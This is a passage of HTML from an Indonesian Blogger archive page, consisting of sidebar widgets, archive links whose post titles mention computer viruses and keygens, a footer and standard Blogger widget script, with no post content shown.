width='237'/> </a> <br/> <span class='caption'>klik gambar untuk masuk</span> </div> <div class='clear'></div> </div> <div class='widget HTML' data-version='1' id='HTML3'> <h2 class='title'>Download free lagu</h2> <div class='widget-content'> <div><form method="GET" action="http://www.index-of-mp3.com/index.php" target="_blank">Masukan Nama Penyanyi - Judul Lagu<br /><input type="text" value="" name="search" maxlength="80" size="30" /><input type="submit" value="Cari Mp3 !" /><input type="hidden" name="source" value="index" checked /><br />Mesin Cari Free Download Mp3 Gratis</form></div> </div> <div class='clear'></div> </div> </div> </li> <!-- /Welcome Message --> <!-- Search --> <li> <h2>Search</h2> <div id='searchform'> <form action='/search' method='get'> <input class='searchtext' name='q' type='text' value=''/> <input alt='Search' class='searchbutton' src='http://3.bp.blogspot.com/_0vKyxg80gxY/SwOYgDItNaI/AAAAAAAAA2s/Lm713lofRD4/s1600/spacer.gif' type='image'/> </form> </div> </li> <!-- /Search --> <div class='sidebar1 section' id='sidebar1'><div class='widget HTML' data-version='1' id='HTML2'> <div class='widget-content'> http://www.indonesiaindonesia.com/imagehosting/image7751.html </div> <div class='clear'></div> </div><div class='widget BlogSearch' data-version='1' id='BlogSearch1'> <h2 class='title'>Cari Blog Ini</h2> <div class='widget-content'> <div id='BlogSearch1_form'> <form action='http://jangkrikvirusdago.blogspot.com/search' class='gsc-search-box' target='_top'> <table cellpadding='0' cellspacing='0' class='gsc-search-box'> <tbody> <tr> <td class='gsc-input'> <input autocomplete='off' class='gsc-input' name='q' size='10' title='search' type='text' value=''/> </td> <td class='gsc-search-button'> <input class='gsc-search-button' title='search' type='submit' value='Telusuri'/> </td> </tr> </tbody> </table> </form> </div> </div> <div class='clear'></div> </div><div class='widget PageList' data-version='1' id='PageList1'> <h2>Laman</h2> <div class='widget-content'> <ul> <li> <a href='http://jangkrikvirusdago.blogspot.com/'>Halaman Muka</a> </li> </ul> <div class='clear'></div> </div> </div><div class='widget Label' data-version='1' id='Label1'> <h2>Labels</h2> <div class='widget-content list-label-widget-content'> <ul> <li> <a dir='ltr' href='http://jangkrikvirusdago.blogspot.com/search/label/tips'>tips</a> <span dir='ltr'>(1)</span> </li> </ul> <div class='clear'></div> </div> </div><div class='widget BlogArchive' data-version='1' id='BlogArchive1'> <h2>Blog Archive</h2> <div class='widget-content'> <div id='ArchiveList'> <div id='BlogArchive1_ArchiveList'> <ul> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://jangkrikvirusdago.blogspot.com/2010/'>2010</a> <span class='post-count' dir='ltr'>(46)</span> <ul> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://jangkrikvirusdago.blogspot.com/2010/07/'>Juli</a> <span class='post-count' dir='ltr'>(6)</span> </li> </ul> <ul> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://jangkrikvirusdago.blogspot.com/2010/05/'>Mei</a> <span class='post-count' dir='ltr'>(4)</span> </li> </ul> <ul> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://jangkrikvirusdago.blogspot.com/2010/04/'>April</a> <span class='post-count' dir='ltr'>(7)</span> </li> </ul> <ul> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://jangkrikvirusdago.blogspot.com/2010/02/'>Februari</a> <span class='post-count' dir='ltr'>(29)</span> </li> </ul> </li> </ul> <ul> <li class='archivedate expanded'> <a class='toggle' href='javascript:void(0)'> <span class='zippy toggle-open'>▼ </span> </a> <a class='post-count-link' href='http://jangkrikvirusdago.blogspot.com/2009/'>2009</a> <span class='post-count' dir='ltr'>(52)</span> <ul> <li class='archivedate expanded'> <a class='toggle' href='javascript:void(0)'> <span class='zippy toggle-open'>▼ </span> </a> <a class='post-count-link' href='http://jangkrikvirusdago.blogspot.com/2009/11/'>November</a> <span class='post-count' dir='ltr'>(1)</span> <ul class='posts'> <li><a href='http://jangkrikvirusdago.blogspot.com/2009/11/virus-asal.html'>virus asal</a></li> </ul> </li> </ul> <ul> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://jangkrikvirusdago.blogspot.com/2009/10/'>Oktober</a> <span class='post-count' dir='ltr'>(7)</span> <ul class='posts'> <li><a href='http://jangkrikvirusdago.blogspot.com/2009/10/mau-hp-gratis-hp-hdtv-yang-gamers-ada.html'>Dapat kan HP,Ipod,PS3 DLL gratis ko,, sumpahhhhhhh...</a></li> <li><a href='http://jangkrikvirusdago.blogspot.com/2009/10/virus-brontok.html'>Virus Brontok</a></li> <li><a href='http://jangkrikvirusdago.blogspot.com/2009/10/virus-vbs.html'>Virus VBS</a></li> <li><a href='http://jangkrikvirusdago.blogspot.com/2009/10/virus-mellisa.html'>Virus Mellisa</a></li> <li><a href='http://jangkrikvirusdago.blogspot.com/2009/10/virus-i-love-u.html'>Virus I Love U</a></li> <li><a href='http://jangkrikvirusdago.blogspot.com/2009/10/bikin-virus-dalam-sekejap-masih-ingat.html'>bikin virus dlm sekejap</a></li> <li><a href='http://jangkrikvirusdago.blogspot.com/2009/10/macam-virus-komputer.html'>Macam Virus KOMPUTER</a></li> </ul> </li> </ul> <ul> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://jangkrikvirusdago.blogspot.com/2009/07/'>Juli</a> <span class='post-count' dir='ltr'>(14)</span> <ul class='posts'> <li><a href='http://jangkrikvirusdago.blogspot.com/2009/07/all-keygen.html'>all keygen</a></li> <li><a href='http://jangkrikvirusdago.blogspot.com/2009/07/free-game-2d.html'>free game 2d</a></li> </ul> </li> </ul> <ul> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='http://jangkrikvirusdago.blogspot.com/2009/06/'>Juni</a> <span class='post-count' dir='ltr'>(30)</span> </li> </ul> </li> </ul> </div> </div> <div class='clear'></div> </div> </div></div> </ul> </div> <!-- /Sidebar --> <div class='end_line'></div> </div> <!-- /Container --> </div> <!-- /Wrapper --> <!-- Footer --> <div id='footer'> <!-- RSS --> <div id='rss'><a href='/feeds/posts/default'></a></div> <!-- /RSS --> <!-- Bottom Navigation Menu --> <div id='task-nav'> <div class='task-nav1 no-items section' id='task-nav1'> </div> </div> <!-- /Bottom Navigation Menu --> <div id='clock'> <script type='text/javascript'>var d = new Date(); document.write(d.getHours()+':'+d.getMinutes());</script> </div> <div id='credit-icon'></div> <!-- Credit --> <div id='credit-box'> Copyright 2009 <a href='http://jangkrikvirusdago.blogspot.com/'>jangkrik dago</a> <br/> <a href='http://www.ezwpthemes.com/'>Free WordPress Themes</a> designed by <a href='http://www.ezwpthemes.com/'>EZwpthemes</a> <br/> Converted into <a href='http://themecraft.net'>Blogger Templates</a> by <a href='http://themecraft.net'>Theme Craft</a> | <a href='http://www.falconhive.com'>Falcon Hive</a> </div> <!-- /Credit --> <div class='endline'></div> </div> <!-- /Footer --> <script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/1807328581-widgets.js"></script> <script type='text/javascript'> window['__wavt'] = 'AOuZoY6LzKMu-fi2BdlCgIQG-tS6O5dAvw:1714225849569';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d1518176830031402701','//jangkrikvirusdago.blogspot.com/2009/','1518176830031402701'); _WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '1518176830031402701', 'title': 'jangkrik dago', 'url': 'http://jangkrikvirusdago.blogspot.com/2009/', 'canonicalUrl': 'http://jangkrikvirusdago.blogspot.com/2009/', 'homepageUrl': 'http://jangkrikvirusdago.blogspot.com/', 'searchUrl': 'http://jangkrikvirusdago.blogspot.com/search', 'canonicalHomepageUrl': 'http://jangkrikvirusdago.blogspot.com/', 'blogspotFaviconUrl': 'http://jangkrikvirusdago.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'id', 'localeUnderscoreDelimited': 'id', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22jangkrik dago - Atom\x22 href\x3d\x22http://jangkrikvirusdago.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22jangkrik dago - RSS\x22 href\x3d\x22http://jangkrikvirusdago.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22jangkrik dago - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/1518176830031402701/posts/default\x22 /\x3e\n', 'meTag': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/16e657cb9c57b8a2', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Dapatkan link', 'key': 'link', 'shareMessage': 'Dapatkan link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Bagikan ke Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Bagikan ke Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Bagikan ke Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27id\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Baca selengkapnya', 'pageType': 'archive', 'pageName': '2009', 'pageTitle': 'jangkrik dago: 2009'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Tautan disalin ke papan klip!', 'ok': 'Oke', 'postLink': 'Tautan Pos'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Khusus', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'jangkrik dago', 'description': 'yuck coba iseng-iseng dech buka blog ni!!!!!', 'url': 'http://jangkrikvirusdago.blogspot.com/2009/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': false, 'isArchive': true, 'isLabelSearch': false, 'archive': {'year': 2009, 'rangeMessage': 'Menampilkan postingan dari 2009'}}}]); _WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'navbar', document.getElementById('Navbar1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header1', document.getElementById('Header1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/1666805145-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/13464135-lightbox_bundle.css'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML4', 'welcome1', document.getElementById('HTML4'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_ProfileView', new _WidgetInfo('Profile1', 'welcome1', document.getElementById('Profile1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML1', 'welcome1', document.getElementById('HTML1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image10', 'welcome1', document.getElementById('Image10'), {'resize': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image11', 'welcome1', document.getElementById('Image11'), {'resize': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image5', 'welcome1', document.getElementById('Image5'), {'resize': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_FollowersView', new _WidgetInfo('Followers1', 'welcome1', document.getElementById('Followers1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_PollView', new _WidgetInfo('Poll1', 'welcome1', document.getElementById('Poll1'), {'pollid': '2414118921187359066', 'iframeurl': '/b/poll-results?pollWidget\x3dPoll1\x26txtclr\x3d%23555555\x26lnkclr\x3d%23a7b0b7\x26chrtclr\x3d%23a7b0b7\x26font\x3dnormal+normal+100%25+Arial,+Verdana,+Sans-Serif\x26hideq\x3dtrue\x26purl\x3dhttp://jangkrikvirusdago.blogspot.com/'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image6', 'welcome1', document.getElementById('Image6'), {'resize': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image7', 'welcome1', document.getElementById('Image7'), {'resize': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image8', 'welcome1', document.getElementById('Image8'), {'resize': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML99', 'welcome1', document.getElementById('HTML99'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image9', 'welcome1', document.getElementById('Image9'), {'resize': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML3', 'welcome1', document.getElementById('HTML3'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML2', 'sidebar1', document.getElementById('HTML2'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogSearchView', new _WidgetInfo('BlogSearch1', 'sidebar1', document.getElementById('BlogSearch1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_PageListView', new _WidgetInfo('PageList1', 'sidebar1', document.getElementById('PageList1'), {'title': 'Laman', 'links': [{'isCurrentPage': false, 'href': 'http://jangkrikvirusdago.blogspot.com/', 'title': 'Halaman Muka'}], 'mobile': false, 'showPlaceholder': true, 'hasCurrentPage': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_LabelView', new _WidgetInfo('Label1', 'sidebar1', document.getElementById('Label1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar1', document.getElementById('BlogArchive1'), {'languageDirection': 'ltr', 'loadingMessage': 'Memuat\x26hellip;'}, 'displayModeFull')); </script> </body> </html>